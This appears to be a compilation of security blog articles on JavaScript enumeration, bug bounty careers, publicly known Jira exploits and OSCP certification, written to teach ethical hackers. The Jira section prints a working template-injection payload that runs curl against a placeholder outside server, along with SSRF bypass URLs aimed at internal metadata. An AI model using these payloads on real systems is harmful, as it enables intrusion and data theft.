JavaScript Enumeration for bug bounty hunters

JavaScript Enumeration is a critical skill to have if you want to level up your penetration testing or bug bounty hunting game. Yet, not everyone does it, partly because it is a boring exercise or it consumes most of your time, not to mention how intimidated you might feel reading someone else’s code. Today, we will explore this topic and understand why it matters, and how you can perform it.

Hopefully, this episode will help you overcome these hurdles and give you the tools you need to make JavaScript Enumeration less painful. We will first understand how it can lead to serious security bugs. Then, we will discover different ways to properly do it. So, stay with me until the end because you will definitely learn some hacking tricks along the way!

Why JavaScript enumeration matters?

If you don’t perform JavaScript enumeration during your hacking engagements, you are overlooking a vital portion of your target web application. In fact, JavaScript powers the client-side; meaning that all the logic that happens before hitting the back-end server is there. Think about it, you have half of the code that you can look through, and code never lies! If there is an error, the code will tell you, you just have to look through it.

Let’s first discover what you could find with JavaScript Enumeration.

JavaScript enumeration can give you easy wins

Because of bad coding practices, the developers can unintentionally introduce low hanging security bugs in the JavaScript code, ready to be exploited by entry-level hackers. Sloppy coding can include hard-coded credentials, hidden web page URLs with no authentication, or even back-end API endpoints with broken access control flaws.

For example, by simply enumerating the code for API endpoints, you can find some unprotected ones. If you want to learn a real-world example of how I found a serious account takeover flaw, make sure to read this article.

JavaScript enumeration helps you understand how the application works

While you are looking through the code for hard-coded credentials and API endpoints, you will naturally get a feel of the structure, the coding style and what the web application does. If you don’t get that, don’t worry, it comes with practice; the more you do it, the easier it becomes. We will explore shortly how you can start doing it.

JavaScript enumeration can give you deep and serious bugs

Besides the low hanging fruits which you can find using JavaScript enumeration, you can uncover hidden issues which fewer people are looking for. These are typically DOM XSS vulnerabilities that you can exploit through postMessage events or the usage of dangerous JavaScript sinks and sources. For example, a developer might use the path part of the URL to populate the DOM using the sink innerHTML. In this case, you can inject malicious JavaScript code that will be reflected in the DOM without proper encoding, leading to a DOM XSS.

If you want to learn and practice DOM XSS, you can visit Portswigger’s article.

JavaScript enumeration simplified with tools

JavaScript enumeration can be intimidating, hard or time-consuming. If that’s the case for you, maybe you are doing it the wrong way! If you jump onto random JavaScript files and look for low hanging fruits only, you might get lucky once, but you won’t find great and consistent bugs. At least you won’t cover the entire attack surface. Instead, I suggest you first extract all JavaScript files, then browse through them, and then you can focus on specific parts which seem interesting.

You can use various tools that will assist you during this exercise. These are the ones I found helpful, but if you prefer other tools, feel free to suggest others in the comments.

Step 1 in JavaScript enumeration: Extract JavaScript files

Sometimes all you have is the login page, that’s fine. Once you finish browsing all the accessible features, your web proxy should have recorded all the JavaScript files. I like to use BurpSuite Professional to extract them all at once, but you can use other alternatives, such as manually downloading all the JavaScript files from BurpSuite Community Edition (The free version of BurpSuite).

To do that, you right-click on your target root entry in the Sitemap, then choose the Find scripts option under the Engagement tools in the contextual menu.

JavaScript Enumeration using BurpSuite Find scripts feature
JavaScript Enumeration using BurpSuite Find scripts feature

From there, you click on Export scripts and choose a file to store them. I like to store them because I will be using the next tools to look for specific things, like endpoints, secrets, etc.

Saving all the scripts into one single file
Saving all the scripts into one single file

Extract JavaScript using free tools

If you have been following this blog, you know that the bug bounty community has published many awesome tools which you can combine to get the content of JavaScript files. I like to use waybackurls and the built-in bash commands xargs, curl and tee. You can find many more on this article. Here is a one-liner that will do the job:

waybackurls target.com | grep "\\.js" | xargs -n1 -I@ curl -k @ | tee -a content.txt

The above one-liner will collect all publicly available JavaScript files using waybackurls. Then, it filters only JavaScript files. From there, it grabs the content of each file using curl. Finally, it stores the result in one file.

Step 2: Beautify the JavaScript code

From my experience, most of the JavaScript files get obfuscated and packed into one single line. Therefore, it’s hard to deal with them as they are. Luckily, there are tools which help at least structure them into readable JavaScript code. The one I use is Jsbeautifier, a command-line tool that accepts a file as input and beautifies its content, unpacks it or deobfuscates it into a resulting file.

First, you install it using pip: pip install jsbeautifier. Then, you run it with js-beautify -o outfile.txt scripts.txt. This will output the file outfile.txt which you can easily browse through.

It’s time for the next step: finding the juicy data we are all looking for!

Step 3: JavaScript enumeration with Grep and the family

Now that we have a readable version of all the JavaScript code in one place, I like to start with Grep to get a feel of what I am expecting. The general command is grep --color -i term outfile.txt. You just change the word term with what you’re looking for. For example, try words like secret, admin, password or token to find hardcoded secrets. Alternatively, you can use a path prefix to look for endpoints. Say you noticed that all API endpoints start with /api/v1. In this case, you can substitute the word term in the grep command with /api/v1 to collect all the API endpoints.

Once you grab some endpoints, and hopefully some secrets, you can focus on areas of interest within the JavaScript files.

Javascript enumeration using Chrome Dev Tools

If you don’t have BurpSuite Pro or you don’t want to parse the entire JavaScript files, you can use your built-in Web Browser Developer tools. I like to use the Chrome Browser.

Look for keywords across the entire website

In Chrome, you can open the Developer Tools using the shortcut Command + option + I on Mac, and Ctrl + Shift + I on Windows. From there, choose the Sources Tab. Once inside, you will see the different files in a tree on the left. Hit Command + option + F on Mac, or Ctrl + Shift + F on Windows and a search menu will appear in the bottom. Type the keywords you found from the previous steps to locate where exactly they appear in the client-side source code.

JavaScript Enumeration using Chrome Developer Tools
JavaScript Enumeration using Chrome Developer Tools

From there, click on the one on the right of the results, which will load the JavaScript file in the main screen.

JavaScript enumeration within a file in Chrome Dev Tools

Once you choose a JavaScript file, it may appear obfuscated or minified. Don’t worry, Chrome can make it readable. You just have to click on the Prety-print button. Alternatively, there is a button named {} on the bottom of the screen, which you can click as well.

The Pretty-print feature in Chrome Developer Tools
The Pretty-print feature in Chrome Developer Tools

From there, hit Command + F on Mac or Ctrl + F on Windows and look for your keyword, such as api_key.

You can search for keywords inside the beautified JavaScript code
You can search for keywords inside the beautified JavaScript code

JavaScript Enumeration using breakpoints

Once you focus on a particular snippet within a JavaScript file which brings your attention, you might find it hard to understand what the code does. This can be due to random variable or function names, or simply because you can’t understand what the code does. In this case, you can set a break-point on one or multiple lines, then refresh the page.

Using breakpoints to pause the execution at areas of your interest
Using breakpoints to pause the execution at areas of your interest

Once the client-side code hits your break-point, you can debug it like you would do in any Code Editor using the controls you have on the menu in the right.

You can use the control buttons to debug the JavaScript code
You can use the control buttons to debug the JavaScript code

JavaScript enumeration examples

After mapping the application, collecting all JavaScript files, looking for interesting areas and debugging the JavaScript code, it really depends on your experience and creativity to find interesting bugs. However, without the prior steps, you wouldn’t be able to focus on the areas that matter. The following are examples which illustrate what hackers have found using JavaScript enumeration.

PostMessage DOM XSS vulnerabilities

In this great article, Mathias explains how he performed JavaScript Enumeration using the very steps you discovered earlier to find and exploit a DOM XSS vulnerability due to a misconfiguration in the PostMessage event handling.

Exploit a token leak to disclose your Paypal password

This blog post explains how Alex, a Security Researcher and bug bounty hunter, could exfiltrate your Paypal password through a token leak. He started with JavaScript enumeration and found an interesting endpoint that he was able to understand and exploit.

Conclusion

Hopefully, you now understand why you should perform JavaScript enumeration. But most importantly, you have a methodical approach and the tools to help during the process.

Bug bounty hunting: The Ultimate Guide

In this exhaustive guide, you will find all you need to know about bug bounty hunting based on my experience as a bug bounty hunter and a triage analyst who handled tens of thousands of bug bounty reports. We will explore the bug bounty history and its ecosystem, understand what to expect,

Imagine a world where companies come to you and ask you to hack them. In return, they will pay you whenever you find a unique vulnerability. And the best part, you don’t have to neither leave your home nor stick to a time schedule!
It sounds unrealistic, right? Well, let me tell you that it’s now a real job, not a fantasy anymore!

When bug bounties didn’t exist

Let’s travel 50 years back. Home computers barely start entering the market. Phone phreaking at its golden age. Hackers painted as cybercriminals and weird people who think outside the norm to cause trouble. The US government passes laws which make it a crime to break into computer systems. I wasn’t yet born, and I’m honestly grateful for that.
Unfortunately, companies neglected hackers and continued bringing products to the world without proper security testing. The situation got to a point where the real cybercriminals saw benefits in compromising the vulnerable companies, and hacking companies they did!

Bug bounty programs to the rescue

Luckily, some major companies felt the need to embrace the hacker spirit and leverage the hacking skills of independent individuals.

The birth of the “bug bounty” term

Back in 1995 the Netscape Communications Corporation company came up with the term “bug bounty” for the first time. Do you remember the Netscape browser? You probably don’t, but it’s the grandfather of modern Web Browsers like Chrome and Firefox. Well, back in the days, the company launched a bug bounty program for the Netscape Navigator 2.0 Beta browser. We had to wait for about 15 years before major companies started creating their own programs. We are talking about Google and Facebook in about 2011. Yahoo! Followed in 2013.

Early baby steps

However, this model had its limitations due to the fact that those programs weren’t mature enough.

First, the rewards were as modest as a t-shirt! Don’t get me wrong, I have nothing against t-shirts, I was so grateful to receive one from SoundCloud after I found a bug, but let’s just say that there are many other factors which drive hackers. According to the 2020 HackerOne Hacker report, 53% hack for money.

Secondly, the programs were limited to only a few companies, meaning that hackers didn’t have enough choice. You either hack Facebook or go to jail hacking others. And this is a big downside because 68% of bug bounty hunters hack for the challenge and the opportunity to learn, according to the same report.

Last but not least, hackers didn’t have a middleware party to defend their bugs if the program didn’t play fair. This doesn’t happen very often, but it can lead to surprising outcomes. In 2013, a hacker wrote a poorly-written report to Facebook about a bug which allowed an attacker to post on an arbitrary Facebook user’s timeline. When Facebook didn’t acknowledge the vulnerability, he then posted a message on Mark Zuckerberg’s timeline. Consequently, he wasn’t eligible for a reward. This is a common issue; when working as a triage analyst at HackerOne, I can’t count the number of poorly-written reports that I had to handle. But of course, it’s not an excuse not to give it enough analysis time and honor the hacker’s effort.

But, why become a bug bounty hunter while you can do penetration testing?

Bug bounty vs Penetration testing

Both bug hunting and penetration testing help secure organizations. However, each one differs from the other in many fundamental aspects. So, if you are a penetration tester who wants to apply the same tactics in bug hunting, you will probably fail. Similarly, if a company organizes a bug bounty program the same way you do in penetration testing assignments, you will probably fail as well. Here are some key differences that you should take into account.

The time factor

A bug bounty program usually runs for years, compared to penetration testing which spans a couple of weeks at most. Besides, there are no limitations for testing outside business hours. As a bug bounty hunter, this means you have all the time to hack as long as you want, without the need for a deadline. Therefore, your tests would be different than a typical penetration test. Usually, bug bounty hunters stick with one or two programs for months, or even years, depending on how big the scope is.

To me, bug bounty hunting is a marathon, while penetration testing is a sprint.

Bug bounty programs don’t accept some vulnerabilities

This is an important factor to consider, especially for penetration testers who are new to bug hunting. In fact, you can easily report informative issues like weak SSL ciphers, verbose errors, etc. In bug bounty programs, these issues are almost always explicitly out-of-scope in the program’s policy.

The money factor

Money is a key difference between bug bounty hunting and penetration testing. Companies pay penetration testers for the entire mission, while bug bounties are paid per valid vulnerability. Therefore, you have to be efficient or you will waste your time. This doesn’t mean that penetration testers are not efficient, quite the contrary. In fact, they can successfully handle simultaneous projects and find great security vulnerabilities. The point is … you must focus on impactful vulnerabilities and stay away from informative bugs if you want to get bug bounties.

The rise of Bug bounty platforms

With all the limitations that traditional bug bounty programs suffered from, there was a need for middleware in the cybersecurity market to help hackers and companies collaborate with each other. Naturally, bug bounty platforms were born to shape a new era in cybersecurity. HackerOne and Bugcrowd were among the first players, but we’ll leave details about each one to another episode. However, they all share pretty much the same core features.

Gamification of hacking

Hacking with bug bounty platforms is like playing a video game. We find vulnerabilities and increase our metrics, which increases our ranking in the leaderboard and opens the door to new programs, new challenges and new experiences. The best part is that we get paid along the way. Programs also get rated, the more active and rewarding they are, the more luckily talented hackers will help them stay secure. It’s a win-win situation.

Bug bounty platform HackerOne 90 Days Leaderboard
Bug bounty platform HackerOne 90 Days Leaderboard

Bug bounty challenges

More and more companies are joining bug bounty platforms, and so it is for people who want to hack. The problem is that not many of them have proper hacking knowledge. It’s easy to see how this is unbalanced. In fact, a bug bounty ecosystem relies on the abundance in both good programs and talented hackers. That’s why those platforms are developing more and more educational content in the form of videos, mini-challenges and CTFs. An example of that is the LevelUp conference which Bugcrowd organizes each year. It hosts talks from great hackers who share updated hacking knowledge. Another example is HackerOne’s hacktivity and the hacker101 website where Hackerone publishes new disclosed reports and provides a free playground for hackers to solve challenges and get private invites.

Bug bounty Hacker101 CTF challenges
Bug bounty Hacker101 CTF challenges

Bug bounty events

Another interesting advantage those platforms bring to the table is live hacking events. They gather the best hackers for a weekend to hack a target onsite. It’s a great experience which brings people together and produces new meaningful relationships. I once received an invitation but I turned it down due to some family health struggles I was going through. It was a big disappointment for me not to attend it, but I didn’t have a choice in that situation. Personally, family comes first.

The Bug bounty community

So far, bug bounty platforms are emerging and they are doing a great job at educating the next generation of hackers. Hunting for bugs has become a trend of its own and the community is growing so fast. In fact, about a third of the hacking crowd have less than 2 years of experience according to the HackerOne Hacker report of 2020. Naturally, the community started building its own knowledge base. New blogs, YouTube channels, live streams and podcasts started bringing even more educational and entertaining content. Allow me to talk about three valuable things that the community has produced.

Bug bounty methodologies

Hacking is an Art, each hacker has a perspective, a set of skills and experiences which shape the methodology he or she follows when approaching a target. Consequently, it is so easy to get lost in the number of clever methodologies out there. Jason Haddix was one of the early hackers who shared his bug bounty methodology, which is now at its 4th version.

Bug bounty tools

Every craftsman is nothing without a proper toolbox, and hackers are no exception. The bug bounty community is producing so many tools that you will have a hard time tracking. By the way, that’s a major reason why Jason’s bug bounty hunting methodology has been revised four times since 2015.

Bug bounty books

For those who enjoy reading, there are many books which will teach you just how to get into the game of bug bounties. One of the first ones was Peter’s Web hacking 101. I downloaded a free copy when signing up with HackerOne, and boy was it helpful! Shout out to Peter Yaworsky from here!

For those who don’t enjoy reading, you better get used to it if you want to survive in this career. Here is a list of books you should read!

Bug bounty benefits

Bug bounty is proving its spot in the cybersecurity market, that’s for sure. It is becoming another way of securing companies through an increasing crowd of hackers. It is useful in many ways.

Bug bounty money

The rise of bug bounty platforms and the increasing public breaches led to a significant increase in the rewards. I receive now and then emails from HackerOne telling me that a program has increased their rewards either for a promotion period or indefinitely. In one live hacking event, payouts surpassed a Million dollar amount! Think about that! A million dollar in just three days!

Freedom and flexibility

Bug bounty hunting allows hackers to live the working lifestyle they feel comfortable in. All the work is done remotely, except for live hacking events, which due to the Corona Virus, has also gone online. We can work alone or collaborate. Flexibility to work late at night or early in the morning is a great benefit. We also can choose from a wide range of programs depending on our preference. Although the majority prefers to make a side hustle income, around 20% work as full-time bug bounty hunters.

Relational dimension

Bug bounty hunting is not just all about making money. In fact, hackers build relationships and expand their friendships and professional network. The bug bounty community is generally open-minded with a young heart. People here are curious, fun and hard-working. We support each other in case someone goes through a hurdle, like a burnout (more on this shortly). Overall, I’d say I’m grateful to be part of such a great community.

Bug bounty drawbacks

Bug bounties cannot be that perfect, can they? There are downsides as well. I feel I’m responsible to put your expectations into perspective and give you a heads up before you leave your job and start hunting for bugs. Bug bounties, like any other thing in this life, has its drawbacks as well.

Instability

When we hunt for bugs, we only get bounties when we are the first to find one, that’s just how it is. This rule brings a great deal of income instability because it generates frustration and fear. Even talented hackers can hunt for days, or even weeks, without finding a single bug. Imagine how frustrating this can be! That’s why the majority prefer to hack part-time.

Isolation and comparisons

Because bug bounty hunting is commonly remote, we are not limited to an office. Some hackers travel the world while hacking. Others prefer to enjoy hunting from the comfort of their couch at home. However, since we don’t have to work with a team, we can sometimes feel lonely. And when we don’t find vulnerabilities, it gets even worse, especially when scrolling the Twitter feed and finding many tweets of others who find bugs and get paid.

Depression and burnout

The aforementioned drawbacks help prepare for the coming of the scariest ghost, the darkest nightmare of all bug hunters, the most wild beast which we call the burnout. You know, the feeling when you work continuously without any results, you lock yourself in front of your machine, you hack day and night and all you see are others finding bugs. Therefore, you lose your confidence and hope doors suddenly get closed. And then the time comes, and you decide to stop everything and never get back to hacking again.

That’s why it is important to pay attention to your mental health while working as a bug bounty hunter. We will talk about that on a dedicated episode. Meanwhile, you can read what other bug bounty hunters think about it. 

Bug bounty programs

Bug bounty programs are your clients, and you should treat them as such. In other words, you have to respect their security policy, deliver high-quality reports and assist them on any need for information. If you consider these points, they will love you!

In bug bounty, there are two types of programs: public and private.

Public programs

Public programs are, as the name suggests, accessible to all bug hunters. You can send security reports through a bug bounty platform or directly through their suggested communication channel, which you can find on the main domain under the /.well-known/security.txt file.

Public programs tend to have a big scope, which makes it a good target for long-term hacking commitment. However, you first need to assess if they have good response metrics. Otherwise, you will have to wait for months to get your reports handled, and yet other months to get a reward if the program provides bug bounties. You can gauge their response by sending some low hanging fruits which are still impactful, like a reflected XSS.

Private programs

Private programs are only accessible through private invites from bug bounty platforms. When you reach a certain level of reputation, you start to get them.

In general, these have a small number of hackers compared to public programs. Besides, they usually get help from the triage analysts of the bug bounty platform to reduce the noise of invalid reports. Moreover, the scope varies from wildcard domains to a single web application. Finally, they generally have good response metrics and pay well, which makes it attractive to talented hackers.

However, I would say that competition is higher in private programs than in public programs. Although the number of hackers is smaller, you have to work harder to uncover deeper bugs which have been overlooked by the previous testers.

Which is better, private or public programs?

In my opinion, it really doesn’t matter! Whether you hack on a public or a private program, you will always find bugs because code never stays the same! Every day, developers write and commit new lines of code, which means new opportunities for bugs to surface.

As long as you have the hacker hunter spirit, I guarantee you success.

How to be a successful bug bounty hunter?

Nowadays, there are so many bug bounty platforms, which host so many programs. This means that bugs are growing in number as well, you just have to develop some patterns to be able to find them.

A bug bounty hunter is a hacker

That’s obvious, but there are so many bug bounty hunters who honestly don’t understand the vulnerabilities that they are looking for. They have the spirit of script kiddies who care only about exploiting vulnerabilities, and a lot less about knowing enough about them.

You must have the spirit of a hacker, meaning that you should be curious how the technology works, and why the bug exists and how to exploit it. Then learn as much as you can about it. That way, you will not only exploit bugs but also develop methodologies about how to look for them.

A bug bounty hunter should have discipline and be consistent

This is one of the most challenging things you have to overcome. In fact, you won’t be paid until you find a bug, so might end up wasting a day, a week or even a month or more without finding anything.

If you hack for money, it might get you a painful burnout, which I already covered separately. Alternatively, if you have a full-time job and a family, it might be challenging to find that sweet spot to hack in your free time. No matter what your situation is, you have to be consistent.

Consistency should also be applied to acquire new knowledge. I suggest you take advantage of the many bug bounty resources to stay up to date.

A successful bug bounty hunter has a methodology

This is a direct result of consistency; the more you hack, the stronger your mind muscles grow. Therefore, you will find yourself following a pattern of tests which will improve over time. Ultimately, this will increase your chances of finding unique bugs.

Every bug bounty hunter has its methodology and you can get inspired from many of them. I published my own and I invite you to read it.

A bug bounty hunter is nothing without a proper toolbox

You have to choose your tools carefully. They should be flexible, simple to use, quick, contain less bugs, etc. Unfortunately, you can’t meet all the requirements. Therefore, you can combine multiple tools, or develop your own.

The bug bounty community offers so many great tools that you should use. I tried collecting the most famous ones in one article, but there are so many emerging tools. You have to keep sharpening and updating your tools if you want to be a successful bug bounty hunter.

A successful bug bounty hunter focuses on few bug bounty programs

If you keep jumping from one program to another, you will only find shallow bugs if you happen to come across a fresh code. Otherwise, there is a high chance you won’t find any bug.

Instead, choose a few programs which have good response metrics, pay fair money and are in line with your taste. You will find deeper bugs this way. Additionally, you will feel less overwhelmed.

A bug bounty hunter writes good bug bounty reports

It’s not all about your technical skills. In the end, you will interact with humans to sell your bug at the highest price. Unfortunately, you can’t do that with poor reports.

You have to understand that your report is the only value you give to the bug bounty program. If you write it well, they will spend less time reproducing and validating the issue, they will quickly triage and reward you. Plus, they will love you and might give you a bonus for your quality report. Read about that in a full article dedicated to this subject.

Some bug bounty hunters use automation for assistance

This is where few hackers shine because they know how to build code, not just break it. If you want to level up your game in bug bounty hunting, you have to automate tasks to enumerate your targets, monitor new domains, assets and changes in the programs you hack on.

Conclusion

If you are barely starting in the infosec industry and want to start doing bug bounties, I recommend you check out the OWASP Top 10 vulnerabilities in practice, which is a guide to the basics of web application security testing.

Jira vulnerabilities and how they are exploited in the wild

I’ve been asked a lot about Jira vulnerabilities. In this article, I compiled the publicly available Jira exploits I could find to help you when you are doing bug bounty hunting or penetration testing.

However, I should mention that you need to have some basic understanding of how web applications work and how to exploit them. If you want to learn that, head over to this ultimate guide.

Jira Server-Side Template Injection (CVE-2019–11581)

This Jira vulnerability created havoc back in 2019 and all bug bounty hunters were looking for it. It exploits the way input was handled in the administrator contact form. It allows remote and unauthenticated users to run Remote Code Execution on the vulnerable Jira instance. To achieve it, follow the steps:

  1. Go to /secure/ContactAdministrators!default.jspa. If you get a form, continue to the next step.
  2. Input $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl http://your_server_here/rcetest?a=a').waitFor() in the subject and request details.
  3. Send the form. If it’s vulnerable this Jira attack will trigger an HTTP request to the server you set within the curl command in the payload above.
  4. If you are doing a penetration test, urgently reach out to your point of contact. And if you are doing bug bounty hunting, stop there and submit a detailed report about the issue.

Security misconfiguration in the Jira Service Desk

This Jira attack exploits a misconfiguration in the Jira Service Desk being exposed to the public. It allows an attacker to gather emails of employees and create Jira tickets. What’s better than to read it from the hacker who discovered it. Inti wrote an exhaustive article about that, so make sure to check it out.

Here are the steps to follow if you want to

  1. Go to /servicedesk/customer/user/login
  2. See if you can register an account and create a ticket as a proof-of-concept.

Publicly available filters and dashboards

This Jira attack exploits, yet again, another Security misconfiguration. And it allows attackers to leak internal data from the vulnerable Jira instance because of how filters can be publicly exposed by default. Within the accessible pages, there is the user picker which discloses a list of internal users. You can read about the details in this article.

The following URLs are the ones you should try, see if you can access a list of users/resources inside the exposed filters:

/secure/popups/UserPickerBrowser.jspa
/secure/ManageFilters.jspa?filterView=popular
/secure/ConfigurePortalPages!default.jspa?view=popular
/rest/project-templates/1.0/createshared

Jira Server-Side Request Forgery (CVE-2017–9506)

This classic Jira attack exploits an SSRF vulnerability, which allows you to do what SSRF does: Read AWS instance metadata, pivot inside the internal infrastructure or trigger XSS. You can read more about SSRF here.

Here are the steps to test for this Jira vulnerability.

  1. Go to /plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.google.com
  2. You should load the Google page within the vulnerable Jira instance.
  3. Stop there and report the bug, asking permission to escalate it.

Another Jira SSRF vulnerability (CVE-2019-8451)

This Jira attack exploits the same vulnerability type as the one before, but in another endpoint which was implementing some poor validation. The bypass is simply appending @target.domain to the vulnerable parameter, target.domain is the page you want to load, such as AWS instance metadata. You can find the details in this article published by Tenable.

Here are the steps to follow if you want to test for it:

  1. Go to /plugins/servlet/gadgets/makeRequest?url=http://vulnerablehost@<http://targethost.com>
  2. You will get the results from targethost.com

Conclusion

Jira is one of the famous issue tracking products and it has its share of vulnerabilities. If you are an ethical hacker, use this list as a testbed during your engagements. If you are a system administrator and have a Jira instance, make sure you have the latest version and that you properly configure it. That way, you will reduce the attack surface.

OSCP Certification: All you need to know

Hello ethical hackers! In this episode, you will learn everything related to OSCP certification. What is OSCP? Why is it a strong certification? What sets it apart? What are the requirements? How to properly prepare for the exam? What to do the day of the exam? And what’s next once you earn your OSCP certification?

OSCP Certification introduction

OSCP stands for Offensive Security Certified Professional, it is Offensive Security‘s most famous certification. Everyone in the industry respects it, and for good reason. In fact, it proves that its holder can perform a penetration testing assignment using a methodical approach and can write a professional pentest report to deliver to the client. Moreover, it demonstrates that its holder can work under pressure and think outside the box when conducting penetration testing. By the way, the motto of OSCP is Try Harder!

OSCP Syllabus, course material, the lab and more

This certification has a syllabus that covers key aspects of penetration testing, it comes with the PWK course, a lab for training and a video package to support the course.

OSCP Syllabus

OSCP covers many penetration testing areas, from information gathering to exploitation. You get to apply your knowledge on various Linux distributions and Windows versions. These machines run a plethora of services. But perhaps the most important aspects I really enjoyed learning was SSH tunnels, privilege escalation and buffer overflows.

With the new 2020 update, this certification offers even more value, especially with the introduction of Active Directory hacking and Empire, which are essential in most real-world infrastructure penetration testing.

PWK course and videos

You won’t pay for the certification voucher only, the price covers the PWK course, which is a PDF file that goes from the basics to the advanced hacking techniques throughout the different chapters. You will learn some Linux commands to work in the terminal, most of the basic web application vulnerabilities, basics of buffer overflow, Active Directory hacking, SSH tunnelling, etc. Each chapter or section comes with a set of exercises that help you apply your knowledge. Besides, if you join the solutions to your final report, you will get 5 extra points.

To support the course PDF, you will get a set of videos that go through the whole concepts in the PDF and demonstrate the concept in practice.

The OSCP lab, price and why I chose it

When I wanted to get certified, I had many certification options. However, I chose OSCP because it provides many key points I was looking for:

  1. It has a hacking lab to practice the course material: I love learning through practice and the lab in the OSCP course is amazing. You will have to breach the perimeter, then work your way through until you own the entire infrastructure.
  2. The exam involves performing actual penetration testing on a new lab and write the report: I wanted to get a great value for the price I am paying and the OSCP exam is also practical, which means that I will apply what I have learned in yet another lab.
  3. With the previous points, the price is reasonable compared to other certifications.
  4. It is respected in the security community: This is reflected in both job offers and the salary. Almost all security offers from junior to senior level include OSCP among the other security certifications. This means that you don’t get a piece of certifying paper, but you actually increase your value in the job market.

Alright, now that you have a general view of what the OSCP is, let’s see what do you need to get it.

OSCP requirements before you apply for it

Although you don’t need prior hacking knowledge to go through this certification, I highly recommend you get comfortable at lease with the basics. OSCP is not for the faint of heart. If you under-estimate it, I doubt you will stand for long.

These are the things I recommend you learn:

Get yourself comfortable working with the terminal

You will spend most of your time on the lab working on remote machines which are only accessible through SSH. Even the Windows machines won’t be exploitable unless you use the command prompt to run your exploitation scripts. Therefore, it is essential to learn at least the basic Linux terminal commands that will help you navigate through the filesystem, install software, copy files around and connect to remote servers.

Learn the basics of web

There is a considerable amount of web applications in the lab, so I advise you to learn how they work. Take your time to understand how the HTTP Protocol works, what is the difference between the client and the server, etc. This will ease your way through the course as you will already have a general view of what they are talking about.

Learn and practice basic hacking techniques

Although the OSCP course teaches you the hacking techniques and concepts from the beginning, I recommend you learn them beforehand. That way, you can quickly go through them and focus on more advanced concepts like exploit development, SSH tunnelling and looting all the machines in the lab. There are many hacking websites which will help you achieve that. They offer great challenges that you can play with, solve and learn along the way. Feel free to read the dedicated article about it.

Practice your skills on boot2root machines

Once you feel comfortable with the hacking challenges, I encourage you to take more time to root some machines. This will allow you to adapt to the kind of hacking activity that you would find during the OSCP lab and the exam. The article I mentioned earlier contains a list of the websites where you can achieve that.

Code something with Python

Many exploits are available in python, and sometimes you will have to modify them to work for your situation. Therefore, knowing Python will help you take full advantage of the labs and speed up your hacking process. Besides, since Metasploit is forbidden in the exam apart from one shot, you have to convert one or two modules to your own Python scripts as a means of practice during your exam preparation.

Understand basic C code

The OSCP course contains a full chapter on Buffer Overflows. Although the concepts are basic, you will still have a hard time understanding and building your exploits if you don’t know anything about the C language. Besides, some machines require you to customize some C code in order to successfully exploit the vulnerability.

The process of applying for OSCP

Do you already have what it takes? Good! You can apply for it online and receive your package. You have three options, either 1, 2 or 3 months of lab access. I recommend you take the 3-month package so that you give yourself enough room for practice.

Expect to present a proof of identity and to use a corporate email. If you don’t have the latter, you can contact the support and tell them that you have no corporate email.

Once the payment is processed, you will get your package containing the course PDF, videos and the VPN access for the lab.

OSCP preparation for the exam

Preparation for the exam starts right when you receive your course material. See, there are some key points I want you to know from the beginning.

Do the course exercises and document them as you go

You will feel lazy solving the exercises and documenting them as you go through the course, but it’s a crucial thing to do. See, documenting your progress and taking notes is a soft skill that you should have if you want to develop quickly. It has two benefits, the first one is that you will secure your extra 5 points in case you need them to pass the exam. Secondly, you will develop the habit of taking notes, which will help you during the exam. Which brings us to the second advice.

Take organized notes

You don’t want to redo all the exploit research, rebuild all your exploits or start Googling how to transfer files between machines during the exam. Everything should be noted beforehand. Your exploits should already be built and organized. Your payloads should be well structured. This will save you tremendous time during the exam.

Take your time to root all the machines in the lab

I recommended you to apply for 3 months of lab access so that you give yourself enough time to grasp, practice and hone your hacking skills on the lab. A friend of mine had a full-time job, a family and purchased one month. Although he was really smart and had already the skills, he simply couldn’t keep up with so many duties on his plates.

OSCP exam

Once you root all the lab machines, I think you will be ready for the exam. It’s not a requirement, but I highly recommend you do it first.

As you might have already known, the OSCP exam is 24 hours long and you have to score at least 65 points to pass. I say 65 because you can send the exercises solution along with the exam report and get 5 extra points, which would complete your minimum 70 points to pass the OSCP exam. You won’t have to pivot between the machines though, each one is separate.

Here is a list of tips that will help you the day of the exam:

Revise your notes

You should have all your notes at your hand. That’s when your prior preparation and documentation will pay off. The notes should contain your code snippets for various tasks such as connecting to different services, transferring files using different methods, bind and reverse shells, your exploits already built and grouped by target OS, etc.

Don’t upgrade your Kali machine

Just work with the version you had throughout the course. Upgrading your machine can introduce surprises that will force you to waste your time troubleshooting instead of solving the exam challenges.

Take regular breaks

You can’t stay productive the entire exam without food and good hydration. So, reserve some time for breaks, it will make you feel better, refreshed. Sometimes, all you need is another perspective, which you can’t get when you are stuck in front of the computer. You just have to notify the proctor, as explained in the official FAQ section.

Start with the Buffer Overflow challenge

One of the machines contains a buffer overflow vulnerability that you will be able to solve without problems if you had solved the one in the course. I recommend you start with it first. This will boost your confidence to tackle the remaining ones.

Beyond OSCP

Hopefully, you are now certified OSCP, congratulations! You have proved that you “tried harder” and you now have the skills required to conduct penetration testing in the real world. However, this is not the end of your journey and you are certainly not an expert. OSCP is a great beginning for a bright future in penetration testing, so don’t waste it! Think about niche areas you want to focus on. For example, you may want to learn more about exploit development, web hacking or Active Directory attacks. Learn the subject and pursue some certification in the field.

OSCP Certification: Congratulations!
OSCP Certification: Congratulations!

Other questions you may ask

OSCP vs CEH: Which is the best?

For me, the short answer is OSCP. The long answer is…it depends! See, CEH is great if you are barely starting in the infosec industry and you still want to quickly get a job even if you don’t have enough practice. In fact, it is recognized by most companies and most of the candidates would have it. So it makes sense to apply for it when you are just starting.

However, I don’t think we should compare it to OSCP. In fact, the exam is a 4 hour Multiple Choice Questions. If you want to become a CEH Master, then you have to pass the 6-hour exam which contains 20 mini-challenges. So, both challenges combined are less than 50% of the 24-hour exam challenge on the OSCP. Besides, OSCP wins at the price as well. In fact, with three months of lab access, the total price is 1349USD, compared to 1898USD for the CEH (The Multiple Choice Questions and the Practical exams, plus registration fees). In my opinion, if budget is a concern for you, you may want to apply for CompTIA PenTest+ instead.

Is a certified OSCP salary higher than CEH?

According to payscale.com, the average OSCP salary is 91,538USD, compared to 82,164USD for CEH at the time of writing this article.

Conclusion

Certifications are a good way to prove that you possess a set of skills, and OSCP is a great one for penetration testers. However, getting certified shouldn’t be the goal. In my opinion, the focus should be on acquiring and applying your hacking skills. That’s what counts!

